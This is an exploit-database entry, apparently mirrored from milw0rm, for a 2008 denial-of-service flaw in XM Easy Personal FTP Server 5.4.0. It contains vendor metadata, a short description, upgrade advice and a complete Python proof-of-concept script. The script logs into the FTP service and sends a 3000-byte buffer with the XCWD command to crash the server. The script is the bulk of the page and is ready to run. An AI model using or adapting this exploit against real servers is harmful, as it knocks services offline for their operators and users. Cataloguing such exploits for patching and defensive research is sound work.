header-logo
Suggest Exploit
vendor:
XM Easy Personal FTP Server
by:
Muris Kurgas a.k.a j0rgan
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: XM Easy Personal FTP Server
Affected Version From: 5.4.2000
Affected Version To: 5.4.2000
Patch Exists: YES
Related CWE: N/A
CPE: a:xm_easy_software:xm_easy_personal_ftp_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

XM Easy Personal FTP Server 5.4.0 (XCWD) DoS

XM Easy Personal FTP Server 5.4.0 is vulnerable to a Denial of Service attack when an overly long string is sent to the XCWD command. When the admin looks at the server log, the application crashes.

Mitigation:

Upgrade to the latest version of XM Easy Personal FTP Server.
Source

Exploit-DB raw data:

#!/usr/bin/python
########################################
# XM Easy Personal FTP Server 5.4.0 (XCWD) DoS
#
# When admin looks at the server log, application crashes :)
#
# Elhamdulillahi Rabbil-alemin!
#
########################################
# bt ~ # ./sploit.py
#
# [+] Saljemo zli bafer :)
# [+] Now wait until the admin looks at server log :)
# [+] Finito!
#
########################################
# Vulnerability discovered and coded by Muris Kurgas a.k.a j0rgan
# jorganwd [at] gmail [dot] com
# http://www.jorgan.users.cg.yu
########################################

import struct
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

bafer = '\x41' * 3000
print "\n [+] Saljemo zli bafer :)"
s.connect(('192.168.190.132',21))
data = s.recv(1024)
s.send('USER ftp' +'\r\n')
data = s.recv(1024)
s.send('PASS lozinka' +'\r\n')
data = s.recv(1024)
print " [+] Now wait until the admin looks at server log :)"
s.send('XCWD ' +bafer+ '\r\n')
s.close()
print " [+] Gotovo! "

# milw0rm.com [2008-04-13]